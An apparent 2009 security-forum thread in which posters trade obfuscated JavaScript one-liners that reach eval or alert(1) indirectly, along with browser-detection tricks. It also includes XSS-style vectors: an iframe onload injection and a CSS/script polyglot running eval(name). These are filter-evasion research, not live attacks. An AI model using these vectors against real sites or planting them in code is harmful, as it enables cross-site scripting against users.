srsly, I <3 you guys. I've been too wrapped in j2ee to play with javascript lately, but I just want to toast you and offer up a free beer (if you're in sf) to anyone that has posted in this thread.

-tx @ lowtech-labs.org

I liked thornmaker's, so I did something somewhat similar:

['ale'+'rt'].map(top['ev'+'al'])[0]['valu'+'eOf']()(1)

edit:
or, slightly more interesting,

['ale'+'rt']['m'+'ap'](top['ev'+'al'])[0]['valu'+'eOf']()(1)

edit:
I also have noticed that,

top['eval'] === top['anything',1,0,false,true,null,undefined,'eval']

-Dan



Edited 4 time(s). Last edit at 01/08/2009 01:40PM by DoctorDan.

@Dan

functions, objects are truthy

From Javascript the good parts:-
'' == '0'//false
0 == ''//true
0 == '0'//true

false == 'false'//false
false == '0'//true

the || and && operator is interesting
1||2//1
0||1//1

1&&0//0
1&&2//2

Which explains why your last statement is true

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

<3 thornmaker's.

['alert(1)',1].reduce(eval)
['alert(1)'].filter(eval)
['alert(1)'].forEach(eval)
['alert(1)'].map(eval)
['alert(1)'].every(eval)
['alert(1)'].some(eval)
[1,'alert(1)'].reduceRight(eval)



Edited 2 time(s). Last edit at 01/08/2009 02:50PM by barbarianbob.

@ Gareth, but does it really explain that equivalency? I mean, [1,2,3]!=[1,2,3]. I think it's something weirder than that.

-Dan

interesting variations @DoctorDan and @barbarianbob :)

@DoctorDan:
there's no "equivalency" or other magic there.
If multiple indexes are given for a bracket accessor, the last one gets evaluated:

var o = { a: "first property", b: "second property", c: "third property" };
alert(o["a", "b"]); // this shows "second property"

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Thx, ma1. Yeah that's what I've come to notice. I suppose we were talking silly relating the "bracket accessor" to equivalency of objects. Two different things...
Anyways, we can use that, because

top[a='al',b='ev',b+a]('alert(1)')

works just fine.


-Dan

'\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029'.replace(/\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029/,\u0065\u0076\u0061\u006c)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Gareth, haha that's whack!!! I'm so confused by that one, even after decoding it. Very nice :)

-Dan

@Dan

I'm not finished yet :)

'\u005c\u0075\u0030\u0030\u0036\u0031\u005c\u0075\u0030\u0030\u0036\u0063\u005c\u0075\u0030\u0030\u0036\u0035\u005c\u0075\u0030\u0030\u0037\u0032\u005c\u0075\u0030\u0030\u0037\u0034\u0028\u0031\u0029'.replace(/\u005c\u0075\u0030\u0030\u0036\u0031\u005c\u0075\u0030\u0030\u0036\u0063\u005c\u0075\u0030\u0030\u0036\u0035\u005c\u0075\u0030\u0030\u0037\u0032\u005c\u0075\u0030\u0030\u0037\u0034\u0028\u0031\u0029/,\u0065\u0076\u0061\u006c)


and ....



RegExp('\u005c\u0075\u0030\u0030\u0036\u0031\u005c\u0075\u0030\u0030\u0036\u0063\u005c\u0075\u0030\u0030\u0036\u0035\u005c\u0075\u0030\u0030\u0037\u0032\u005c\u0075\u0030\u0030\u0037\u0034\u0028\u0031\u0029')[-1].replace(RegExp('\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0036\u005c\u0075\u0030\u0030\u0033\u0031\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0036\u005c\u0075\u0030\u0030\u0036\u0033\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0036\u005c\u0075\u0030\u0030\u0033\u0035\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0037\u005c\u0075\u0030\u0030\u0033\u0032\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0037\u005c\u0075\u0030\u0030\u0033\u0034\u005c\u0075\u0030\u0030\u0032\u0038\u005c\u0075\u0030\u0030\u0033\u0031\u005c\u0075\u0030\u0030\u0032\u0039'),\u0065\u0076\u0061\u006c)

and for good luck.....

\u0052\u0065\u0067\u0045\u0078\u0070('\u005c\u0075\u0030\u0030\u0036\u0031\u005c\u0075\u0030\u0030\u0036\u0063\u005c\u0075\u0030\u0030\u0036\u0035\u005c\u0075\u0030\u0030\u0037\u0032\u005c\u0075\u0030\u0030\u0037\u0034\u0028\u0031\u0029')[-1].\u0072\u0065\u0070\u006c\u0061\u0063\u0065(\u0052\u0065\u0067\u0045\u0078\u0070('\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0036\u005c\u0075\u0030\u0030\u0033\u0031\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0036\u005c\u0075\u0030\u0030\u0036\u0033\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0036\u005c\u0075\u0030\u0030\u0033\u0035\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0037\u005c\u0075\u0030\u0030\u0033\u0032\u005c\u0075\u0030\u0030\u0035\u0063\u005c\u0075\u0030\u0030\u0037\u0035\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0030\u005c\u0075\u0030\u0030\u0033\u0037\u005c\u0075\u0030\u0030\u0033\u0034\u005c\u0075\u0030\u0030\u0032\u0038\u005c\u0075\u0030\u0030\u0033\u0031\u005c\u0075\u0030\u0030\u0032\u0039'),\u0065\u0076\u0061\u006c)

Confused? Hackvertor isn't:-
http://tinyurl.com/hackvertor

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 3 time(s). Last edit at 01/15/2009 02:37AM by Gareth Heyes.

o={"x"setter:Function},o=o.x='alert\x28\x27\x49\x20\x52\x55\x4c\x45\x20\x3a\x29\x27\x29',new o

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

x=new function()Function
o={
"x\
"setter:#1=x
}
new(o.x='alert(1)')

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Haha - the whole thing combined with sharp variables? Nice!!

This is a awesome hack by Andrea Giammarchi. It isn't really security related but I loved the js hack so much I thought I'd post it here. Detects if the browser is IE or not:-

try{IE=window=!1}catch(e){IE=!0}

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

I win :D

IE=top.execScript?1:0

//21! Beat that :D

Update...
Damn Andrea beat me

IE=!!top.execScript

Actually I win again:-
IE='\v'=='v'

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 01/28/2009 05:52AM by Gareth Heyes.

Here is how to detect every major browser using 94 bytes of code:-

B=/a/[-1]=='a'?'FF':'\v'=='v'?'IE':/a/.__proto__=='//'?'Saf':/s/.test(/a/.toString)?'Chr':'Op'

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Quirky!

-Dan

@oxotnick

Very nice :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

['alert(1)',1].sort(eval)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

document.evaluate('//body', document, null, XPathResult.ANY_TYPE, null).iterateNext().innerHTML='<iframe onload=alert(1)>'

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

/iiiiggggmmmm/iiiiiggggmmmm/ /iiiiiggggmmmmmmm/iiiiiggggmmmm/alert(1)

I call this the Homer vector

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 3 time(s). Last edit at 03/13/2009 11:08AM by Gareth Heyes.

lol

alert(alert(alert(alert(1).watg)))

it'll only alert once and then die in an error

nuffin' spectacular, but I thought it was kinda fun



Edited 1 time(s). Last edit at 03/13/2009 06:27PM by Kyo.

@kyo

Yeah fun I like it

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

//<style>*{color:red}</style><script> {eval(name)}body 
{color:red;xss:expression(window.x?0:(eval(name),x=1))} 
//</script><?='µ';

:)

<undefined></undefined>.(alert(1))

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]